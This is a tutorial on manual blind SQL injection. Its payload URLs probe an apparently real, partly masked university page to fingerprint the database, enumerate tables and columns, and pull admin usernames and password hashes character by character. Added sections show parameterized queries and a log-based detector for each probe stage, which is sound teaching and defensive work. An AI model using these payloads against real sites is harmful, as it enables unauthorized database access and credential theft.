SQL injection has been around for a long time, yet I find that some friends still cannot inject by hand, so I will demonstrate it here. Experts can skip this.
As we all know, injection generally arises on a variable that is not filtered before being used in a query, such as ?id=xx.
The following uses this URL as an example:
http://zsb.xxx.edu.cn/2j.asp?id=24 and 1=1 returns normally
http://zsb.xxx.edu.cn/2j.asp?id=24 and 1=2 returns an error
1=1 is true and 1=2 is false, so the first request returns normally and the second returns an error.
The SQL statement executed by the page becomes the following, with whatever was appended to the id parameter carried straight into the WHERE clause:
select * from tablename where field=24
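To make the point above concrete from the defender's side, here is an added example that is not part of the original article: a query built by string concatenation next to the same query built with a bound parameter. It uses an in-memory SQLite table (a constructed stand-in for the page's Access/MSSQL backend; the table and column names are assumptions) and shows that the normal-vs-error difference between "and 1=1" and "and 1=2" exists only for the concatenated version.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the article's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table article (id integer primary key, title text)")
    conn.executemany(
        "insert into article values (?, ?)",
        [(24, "admissions notice"), (25, "another notice")],
    )
    return conn


def lookup_vulnerable(conn, raw_id):
    """Builds the statement by concatenating the raw parameter, so anything
    appended to the id becomes part of the WHERE clause."""
    sql = "select * from article where id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, raw_id):
    """Hardened form: the id must be an integer and is passed as a bound
    parameter, so appended text is never interpreted as SQL."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return None  # reject non-numeric ids instead of executing them
    return conn.execute("select * from article where id = ?", (id_value,)).fetchall()


def page_behaviour(lookup, raw_id):
    """'normal' when the lookup yields a row, 'error' otherwise: the same
    signal the article reads from the page to decide a condition's truth."""
    try:
        rows = lookup(make_db(), raw_id)
    except sqlite3.Error:
        return "error"
    return "normal" if rows else "error"


def boolean_oracle_exists(lookup):
    """True when a true condition and a false condition appended to the id
    produce different page behaviour, i.e. the and 1=1 / and 1=2 test works."""
    return page_behaviour(lookup, "24 and 1=1") != page_behaviour(lookup, "24 and 1=2")


if __name__ == "__main__":
    for name, lookup in (("concatenated", lookup_vulnerable), ("parameterized", lookup_parameterized)):
        print(name, "oracle:", boolean_oracle_exists(lookup))
```

The parameterized lookup returns the same result for both probes, so the page no longer leaks one bit per request; rejecting non-integer ids up front also makes the probe visible as a distinct error that can be logged.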
Once injection is confirmed, the system tables are used to determine whether the database is Access or MSSQL.
Access's system table is msysobjects, which cannot be read in the web environment, while SQL Server's system table is sysobjects, which can be read in the web environment. Submit the following two statements:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from sysobjects)>0
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from msysobjects)>0
If the database is SQL Server, the first page returns normally and the second returns an error; if it is Access, both return an error.
After submitting both, both returned an error, so this can be regarded as an Access database.
Figure 3.
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from Table Name)>0
If the table exists, the page returns normally; if not, it returns an error.
At first I submitted:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from admin)>0
An error was returned, indicating that the admin table does not exist. Submitting the following table later returned a normal page:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from article_admin)>0
So the table article_admin exists.
Guessing column names:
and (select count(field name) from article_admin)>0
Submit:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(username) from article_admin)>0
If the page returns normally, submit:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(password) from article_admin)>0
The page returns normally, indicating that the username and password fields exist.
The length of the username and password:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 len(username) from article_admin)=5
The page returns normally, so the length of the username is 5.
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 len(password) from article_admin)=16
The page returns normally, so the length of the password is 16, that is, a 16-character MD5 value.
Guessing the content of the username and password:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 asc(mid(username,1,1)) from article_admin)=97
The page returns normally, indicating that the first character of the first username has ASCII code 97, that is, "a".
To guess the second character, change mid(username,1,1) to mid(username,2,1), and so on for the remaining positions.
Changing username to password works the same way.
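The whole sequence above (true/false condition, system-table fingerprint, table and column guessing, length probe, character extraction) leaves a recognisable trail in the web server log. The following added example, not part of the original article, decodes query strings from a few constructed IIS-style log lines and groups the probe stages by source address so that a host working through several stages against the same script can be flagged. The log format, addresses and threshold are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Signatures for each stage of the blind-injection sequence, matched on the
# URL-decoded query string (case-insensitive, whitespace-tolerant).
PROBE_PATTERNS = [
    ("boolean_test",   re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("db_fingerprint", re.compile(r"\bfrom\s+m?sysobjects\b", re.I)),
    ("object_enum",    re.compile(r"\bselect\s+count\s*\(", re.I)),
    ("length_probe",   re.compile(r"\blen\s*\(", re.I)),
    ("char_extract",   re.compile(r"\basc\s*\(\s*mid\s*\(", re.I)),
]

# Constructed log lines: date time client-ip method path query status.
LOG_LINES = [
    "2005-06-01 10:00:01 192.0.2.10 GET /2j.asp id=24 200",
    "2005-06-01 10:00:05 192.0.2.10 GET /2j.asp id=24+and+1%3D1 200",
    "2005-06-01 10:00:07 192.0.2.10 GET /2j.asp id=24+and+1%3D2 500",
    "2005-06-01 10:00:12 192.0.2.10 GET /2j.asp id=24+and+(select+count(*)+from+sysobjects)%3E0 500",
    "2005-06-01 10:00:15 192.0.2.10 GET /2j.asp id=24+and+(select+count(*)+from+msysobjects)%3E0 500",
    "2005-06-01 10:00:30 192.0.2.10 GET /2j.asp id=24+and+(select+count(*)+from+article_admin)%3E0 200",
    "2005-06-01 10:00:41 192.0.2.10 GET /2j.asp id=24+and+(select+top+1+len(username)+from+article_admin)%3D5 200",
    "2005-06-01 10:00:55 192.0.2.10 GET /2j.asp id=24+and+(select+top+1+asc(mid(username,1,1))+from+article_admin)%3D97 200",
    "2005-06-01 10:01:02 198.51.100.7 GET /2j.asp id=25 200",
]


def classify_request(raw_query):
    """Return the list of probe stages whose signature appears in the query."""
    decoded = unquote_plus(raw_query)
    return [name for name, pattern in PROBE_PATTERNS if pattern.search(decoded)]


def summarize(log_lines):
    """Map each client address to the set of probe stages it has used."""
    stages_by_ip = {}
    for line in log_lines:
        fields = line.split()
        if len(fields) < 7:
            continue  # skip malformed lines rather than crash the parser
        ip, query = fields[2], fields[5]
        for stage in classify_request(query):
            stages_by_ip.setdefault(ip, set()).add(stage)
    return stages_by_ip


def flag_sources(log_lines, min_stages=3):
    """Addresses that have progressed through at least min_stages distinct stages."""
    return sorted(ip for ip, stages in summarize(log_lines).items() if len(stages) >= min_stages)


if __name__ == "__main__":
    for ip, stages in summarize(LOG_LINES).items():
        print(ip, sorted(stages))
    print("flagged:", flag_sources(LOG_LINES))
```

Matching on decoded text matters because the probes arrive URL-encoded; a single stage may fire on benign traffic, so the flag is raised only when one source chains several stages, which is exactly what a manual walkthrough like the one above produces.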